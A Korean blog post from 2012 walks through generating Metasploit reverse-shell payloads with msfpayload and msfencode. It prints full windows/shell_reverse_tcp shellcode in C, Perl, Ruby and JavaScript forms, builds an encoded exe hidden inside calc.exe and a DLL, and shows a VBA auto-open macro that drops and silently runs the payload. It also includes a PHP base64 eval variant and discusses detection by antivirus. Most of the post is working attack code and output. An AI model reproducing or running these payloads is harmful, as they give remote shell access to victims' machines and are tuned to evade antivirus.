'msfpayload'에 해당되는 글 1건

  1. 2012.01.12 Metasploit Generating Payloads
0x04 reference&tools2012. 1. 12. 15:59


http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads



 

root@LUCKYSTRIKE:~# msfpayload -h
Usage: /usr/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:
    -h        Help banner
    -l        List available payloads



root@LUCKYSTRIKE:~# msfencode -h
Usage: /usr/metasploit/msf3/msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template


root@LUCKYSTRIKE:~# msfencode -l

Framework Encoders
==================

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder




payload 만드는데 필요한 명령 두가지와 encoder 리스트입니다.
msfpayload만 쓰셔도 되지만 특이한 경우에는 msfenocde도 사용해야하기 때문에 둘 다 언급했습니다.

다음은 msfpayload 명령을 사용해서 payload를 만드는 방식에 대한 예제입니다.
payload는 개인적으로 좋아라하는 windows/shell_reverse_tcp를 사용했습니다.


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 S

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     192.168.126.146  yes       The listen address
LPORT     9999             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell



root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 C

/*

 * windows/shell_reverse_tcp - 314 bytes

 * http://www.metasploit.com

 * VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,

 * ReverseConnectRetries=5, EXITFUNC=process,

 * InitialAutoRunScript=, AutoRunScript=

 */

unsigned char buf[] =

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"

"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"

"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"

"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"

"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"

"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"

"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"

"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"

"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"

"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"

"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"

"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"

"\x68\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56"

"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"

"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"

"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"

"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"

"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"

"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"

"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";



root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 P
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" .
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" .
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" .
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" .
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" .
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" .
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" .
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" .
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" .
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" .
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" .
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" .
"\x6f\x6a\x00\x53\xff\xd5";


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 y
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 R | msfencode -b '\x00'
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

buf =
"\xb8\x9e\x0b\x64\x4f\xdb\xdf\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x4f\x83\xc3\x04\x31\x43\x10\x03\x43\x10\x7c\xfe\x98" +
"\xa7\x09\x01\x61\x38\x69\x8b\x84\x09\xbb\xef\xcd\x38\x0b" +
"\x7b\x83\xb0\xe0\x29\x30\x42\x84\xe5\x37\xe3\x22\xd0\x76" +
"\xf4\x83\xdc\xd5\x36\x82\xa0\x27\x6b\x64\x98\xe7\x7e\x65" +
"\xdd\x1a\x70\x37\xb6\x51\x23\xa7\xb3\x24\xf8\xc6\x13\x23" +
"\x40\xb0\x16\xf4\x35\x0a\x18\x25\xe5\x01\x52\xdd\x8d\x4d" +
"\x43\xdc\x42\x8e\xbf\x97\xef\x64\x4b\x26\x26\xb5\xb4\x18" +
"\x06\x19\x8b\x94\x8b\x60\xcb\x13\x74\x17\x27\x60\x09\x2f" +
"\xfc\x1a\xd5\xba\xe1\xbd\x9e\x1c\xc2\x3c\x72\xfa\x81\x33" +
"\x3f\x89\xce\x57\xbe\x5e\x65\x63\x4b\x61\xaa\xe5\x0f\x45" +
"\x6e\xad\xd4\xe4\x37\x0b\xba\x19\x27\xf3\x63\xbf\x23\x16" +
"\x77\xb9\x69\x7f\xb4\xf7\x91\x7f\xd2\x80\xe2\x4d\x7d\x3a" +
"\x6d\xfe\xf6\xe4\x6a\x01\x2d\x50\xe4\xfc\xce\xa0\x2c\x3b" +
"\x9a\xf0\x46\xea\xa3\x9b\x96\x13\x76\x0b\xc7\xbb\x29\xeb" +
"\xb7\x7b\x9a\x83\xdd\x73\xc5\xb3\xdd\x59\x70\xf4\x4a\xa2" +
"\x2b\x84\x18\x4a\x2e\x78\x3a\x84\xa7\x9e\x2e\x8a\xe1\x09" +
"\xc7\x33\xa8\xc1\x76\xbb\x66\x41\x1a\x2e\xed\x91\x55\x53" +
"\xba\xc6\x32\xa5\xb3\x82\xae\x9c\x6d\xb0\x32\x78\x55\x70" +
"\xe9\xb9\x58\x79\x7c\x85\x7e\x69\xb8\x06\x3b\xdd\x14\x51" +
"\x95\x8b\xd2\x0b\x57\x65\x8d\xe0\x31\xe1\x48\xcb\x81\x77" +
"\x55\x06\x74\x97\xe4\xff\xc1\xa8\xc9\x97\xc5\xd1\x37\x08" +
"\x29\x08\xfc\x38\x60\x10\x55\xd1\x2d\xc1\xe7\xbc\xcd\x3c" +
"\x2b\xb9\x4d\xb4\xd4\x3e\x4d\xbd\xd1\x7b\xc9\x2e\xa8\x14" +
"\xbc\x50\x1f\x14\x95"



R 옵션은 Raw 형태로 출력하라는 옵션이라서 인코딩을 하지 않으면 아래와 같이 나옵니다.



root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
// ReverseConnectRetries=5, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=

%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u927e%u0268%u2700%u890f%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff



JavaScript 형태는 인코딩하면 사이즈가 4배 정도 늘어납니다.
type이 js_le와 js_be가 있는데 차이가 없더군요..둘의 차이점은....좀 더 알아봐야 할 듯...-_-;;

root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J | msfencode -t js_le
[*] x86/shikata_ga_nai succeeded with size 1183 (iteration=1)


%u7db8%u9a64%udb2b%ud9c1%u2474%u5ef4%uc929%ub966%u0121%u4631%u8316%u04c6%u4603%u9f12%ub591%u7f04%ua32d%u1b34%u44be%uccba%uc333%u7e59%u4cd8%u1bd0%u1656%u9066%u87f3%u35f2%u178c%u99d6%u695f%uf91c%uf0fd%u9c28%u0972%u71fe%u6555%uf974%u4fe5%u2e5b%uc771%u1ed4%u4210%u3f6f%ufc99%ud0e3%u8934%u4dd5%u1ca8%ube20%uff19%u8562%ubd37%u56c5%u7cfd%u39bc%u0d91%u9525%ube49%uaaed%u6ada%u05d3%ua0e4%u5405%ufd20%ua777%ucb7e%uf6a9%u054a%ud89a%u39fe%u4aad%u84ab%u5308%uce6a%u8346%u1f86%ue3b8%u3ac4%u86b0%ub79a%u0b59%u5634%ueecc%ud2a9%u9542%u6959%u300a%ub0d1%u96f9%u8e35%uaf59%u5661%u610f%u6bc9%u0fdf%uf0a2%u9c7a%udb4f%u68a4%u0c9f%u2585%u3bb1%udcb1%ud02c%u6b78%u47db%ue629%ucb4d%u7aae%u9bfb%u4744%u7bd7%uc2e4%u1353%u59b4%ub8f2%ud35b%u4f63%u2ee8%u8a7e%u3565%ub246%u90e6%u0ac3%ue2d9%u4e12%u226c%ua055%u67be%uf8e0%u5187%udc3a%uae82%u7b0b%uf558%ub51e%u9196%u9cd2%u6ca3%ue721%uab29%u2f30%u80cc%u6a8a%ud665%u4189%u33b7%u9f3b%u0385%ufaa1%u4b9c%u3447%u8e6b%u04f2%ue7ab%u4dce%u65be%ube18%u4c26%u8c13%uba90%ud5ba%ua4a9%u255a%u0d63%u2ad6%u7eb3%u8829%ub3c6%ub32a%u964b%u04d9%ueeef%u4e10%u3c9a%ua030%u6556%ua3c3%u57a7%u011b%ua7bd%u2a3f%ue25b%ucfca%udc94%u3505%u7aae%u5056%ua762%uafe3%u92b5%uf539%ue9cc%ucd0f%u344c%u1505%u07f3%u40d5%u5486%ubf76%ubf5a%udb0d%u8faa%u06dc%udbbe%u712e%u0622%ub93a%u7f97%u9cfc%u48a2%ubdc8%u937c%u7245%uef4c%u57c4%u3adb%ufc37%u6113%uc842%u516b%u15ce%u99f9%u676c%ufc39%ub505%ucb09%u9cdd%u571c%uef2d%ub2ef%u3c24%ud973%u67f5%u1906%u5398%u7cd1%ua429%u4d43%uf1e5%ud5f6%uca33%u30c9%u4c49%u094c%ub580%u0ee5%u86d2%uf534%u8a67%u9407%u69e4%u661d%u128f%ua3bb%ub63a%u9b74%u1df5%ube0e%u6ec5%u65c8%uf753%u521c%ud2ae%uab29%u2cb4%uf6e1%u7e41%u9e67%ua591%u6c12%u92d6%ub5b8%ub863%u8272%u67be%ud406%u52a2%u01d0%uaf56%u7c14%ueaa0%u1a21%uc4e3%uc7f8%u1d76%u3199%u784f%u0928%ub2cd%u54b1%u8664%uae0d%ucde4%ufe18%u3cd9%udb80%u076c%u4724%u52bc%ubfdd%uaca0%u9a29%ua951%ud461%u14a8%u20f7%u6eff%u6dce%ubc8a%u5f04%ue440%uaa11%ud3ca%uf1bb%u297f%ucf05%u744e%u1a00%u4380%u418b%uce97%uef7b%u3431%uda09%u03db%u01c9%u5451%u7c4b%u81f8%u1bfe%uf898%uc632%uce29%u3056%u15e4%u73e2%u603b%u5634%ubc4e%uab74%u9982%ufd01%ud1da%u24d9%u256e%u1129%u6ca7%u6838%u5da1%ub7f0%u9458%u82cc%ufd96%udb59%uc9e1%u06c2%u027b%u7a32%u47b5%u1e49%ue18c%ufbd7%ud49b%u6127%u025c%u553d%u7cac%ub08c%u4eb9%u8ad7%u8a71%udf52%ub745%u3aa8%u01d3%u71e9%u4b2b%u417c%ua17b%u9447%uf50e%ue087%ud092%u6892%u7d66%u553b%ub4fd%ua0f3%u93cd%uff86%ue91d%uda58%u2428%u10a9%u63e3%u6dbc%u5833%ua80e%uc546%u840f%u2090%u8ca5%u1a86%u6923%u3d32%u14cd%ue48c%uee64%u82d5%u2bb3%u7d53%u5084%ua4ac%uf781%uc5ea%ud259%u337f%u2ba8%u66e5%u63b9%u5ed7%ua679%uad62%u984e%uf4bc%ue0c5%uc685%u3543%u1083%u50ed%u785d%uaf98%ub397%uea52%u85a2%uc1aa%ucf7b%u48bf%u36b1%uaf79%u7ecc%u9848%u5a1a%u82df%uc257%u6f79%u3ced%u59b5%u6435%u93cc%u5071%ufe4a%ua40c%u30ab%uf1df%u05be%u9f28%u4073%u6a23%ubf43%ub1fc%ud9de%u8934%u0011%udc4c%u7c63%u3bcf%ub5f1%u7139%u90c0%u1f30%ubf56%ufa88%u5ce3%u32da%u873a%u0951%uf376%u48ad%ucb03%ua1fc%u0e88%ufd8a%u602a%udb45%ub2c7%u1791%u971c%u34ac%ue66a%u9e7e%u3ce7%ud04b%u1937%u25c6%u5408%u631c%ua31d%u5e6a%ueeeb%u94e7%uc525%uf031%u113c%ucf5b%u7c88%u1ad6%u4bc3%u402e%u865e%ubf78%ucd93%u88f1%u3bea%ud3c2%u7079%u7f54%u53e1%u19ed%ua383%uc33b%ueb3e%u6f7a%u2ef4%u5b08%u5593%u86c2%ua12e%ufc14%uece6%ucd2d%u8836%u14ab%u6442%u610c%ua194%ubc19%u9180%u9bd6%u873d%ud27e%u628d%u780a%u088c%u59c1%ub225%uc41c%u17f5%u3d2a%u36c0%u18e6%ud959%u5530%u3c99%ufb48%u07bd%ude87%u1148%u1981%uf8d7%u6938%u6674%ua8f6%u510f%u829b%ub8d9%udb2e%uf215%u3eb1%u9723%u2701%u72a9%u9717%u4b18%uf2e2%u8717%u9f3b%uc2b5%u6836%u3d08%ub38a%u0b19%u8d8d%u5687%uc738%ua874%u02f2%uac0e%u2ac7%u4196



root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -o reverse_shell
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)


type을 exe 형태로 지정해서 파일로 떨궈볼려고 했는데 안되더군요..너무 작다는 메시지만 계속 뿌립니다.



인코딩을 하지 않으면 PE 포맷 형태로 나오긴 합니다만...뭔가 다른 방법이 있을듯 합니다.
(일단 포스팅하고 삽질을 좀 더 해봐야할 듯...)



위 문제점은 아래 방법으로 해결했습니다. 히히

root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -t exe -x calc.exe -k -o reverse_shell.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html

-x 옵션은 지정된 템플릿을 바탕으로 실행 파일을 만들게끔 해줍니다. -k 옵션과 함께 사용해야 하며
-x 옵션 뒤에 디렉토리를 따로 지정하지 않으면 metasploit 설치 디렉토리 하위에 data/templates에 지정한 파일(calc.exe)가 있어야 합니다.

참고했던 위 페이지에서 처럼 실행해봤더니 잘 실행됨을 확인할 수 있었습니다. ㅎㅎ



msfencode에 대한 더 많은 삽질이 필요할 듯 합니다.
좀 더 알게되면 추가 포스팅해야겠습니다.


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 D | msfencode -o reverse_shell.dll -t dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 14365 (iteration=1)


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 V
&H00&...(snip)...H00&
'Created by msfpayload (
http://www.metasploit.com).
'Payload: windows/shell_reverse_tcp
' Length: 314
'Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
 Bntml12
End Sub
Sub Bntml12()
 Dim Bntml7 As Integer
 Dim Bntml1 As String
 Dim Bntml2 As String
 Dim Bntml3 As Integer
 Dim Bntml4 As Paragraph
 Dim Bntml8 As Integer
 Dim Bntml9 As Boolean
 Dim Bntml5 As Integer
 Dim Bntml11 As String
 Dim Bntml6 As Byte
 Dim Ilbpdhngga as String
 Ilbpdhngga = "Ilbpdhngga"
 Bntml1 = "qGPLaRGNNbzhDLG.exe"
 Bntml2 = Environ("USERPROFILE")
 ChDrive (Bntml2)
 ChDir (Bntml2)
 Bntml3 = FreeFile()
 Open Bntml1 For Binary As Bntml3
 For Each Bntml4 in ActiveDocument.Paragraphs
  DoEvents
   Bntml11 = Bntml4.Range.Text
  If (Bntml9 = True) Then
   Bntml8 = 1
   While (Bntml8 < Len(Bntml11))
    Bntml6 = Mid(Bntml11,Bntml8,4)
    Put #Bntml3, , Bntml6
    Bntml8 = Bntml8 + 4
   Wend
  ElseIf (InStr(1,Bntml11,Ilbpdhngga) > 0 And Len(Bntml11) > 0) Then
   Bntml9 = True
  End If
 Next
 Close #Bntml3
 Bntml13(Bntml1)
End Sub
Sub Bntml13(Bntml10 As String)
 Dim Bntml7 As Integer
 Dim Bntml2 As String
 Bntml2 = Environ("USERPROFILE")
 ChDrive (Bntml2)
 ChDir (Bntml2)
 Bntml7 = Shell(Bntml10, vbHide)
End Sub
Sub AutoOpen()
 Auto_Open
End Sub
Sub Workbook_Open()
 Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************


Ilbpdhngga
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&...(snip)...


너무 길게 나와서 앞뒤로 짤랐습니다.
파일로도 떨궈 봤는데 사이즈가 상당히 크더군요..


root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 W | msfencode -b '\x00'
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[-] x86/shikata_ga_nai failed: Encoding failed due to a bad character (index=194, char=0x00)
[*] php/base64 succeeded with size 91691 (iteration=1)

buf =
"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65" +
"\x63\x6f\x64\x65\x28\x55\x45\x73\x44\x42\x42\x51\x41\x41" +
"\x41\x41\x49\x41\x4c\x35\x31\x4c\x45\x41\x62\x64\x7a\x76" +
"\x6b\x52\x77\x41\x41\x41\x45\x63\x41\x41\x41\x41\x55\x41" +
"\x41\x41\x41\x54\x55\x56\x55\x51\x53\x31\x4a\x54\x6b\x59" +
"\x76\x54\x55\x46\x4f\x53\x55\x5a\x46\x55\x31\x51\x75\x54" +
...(snip)...



war 형태로 type을 war로 지정하고 했더니 exe 형태일때랑 동일한 에러메시지가 떠서 인코딩했더니 상당히 길게 나오네요..




항상 msfpayload만 가지고 간단한 쉘코드만 작성해서 사용해봤었는데 msfencode와 같이 사용하면 꽤 괜찮다는 생각이 듭니다.
다만, msfencode로 인코딩한 파일을 제가 사용하는 빨간우산은 악성코드로 잡더군요..
바이러스토탈에 올려보니 무려 23개의 백신에서 탐지하고 있었습니다.

